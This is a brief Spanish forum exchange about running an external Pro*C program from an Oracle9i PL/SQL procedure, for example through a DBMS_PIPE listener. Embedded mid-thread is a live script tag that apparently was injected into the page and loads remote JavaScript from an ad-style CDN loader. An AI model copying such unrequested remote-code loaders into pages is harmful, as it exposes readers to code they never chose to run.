Ejecutar programas externos desde oracle

Estoy realizando un desarrollo utilizando PL/SQL
(Oracle9i) y necesito ejecutar desde allí (procedimiento almacenado) un
programa externo hecho en lenguaje C. Desconozco la forma (si existe) de
como hacerlo, de antemano le agradezco la ayuda que me pueda
suministrar.

1 respuesta

Respuesta

Aclarame un poco mas.

¿El programa en C es ProC?

Hay unas librerias Java que permiten ejecutar programas externos

Y si tienes ProC, crea un Programa Pequeño que este monitoreando en DBMS_PIPE y que sea este ProC el que ejecute cualquier cosa en el SO.

Buenas noches experto, el programa es ProC

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Enviame tu email para enviarte el codigo ProC para hacer lo que necesitas.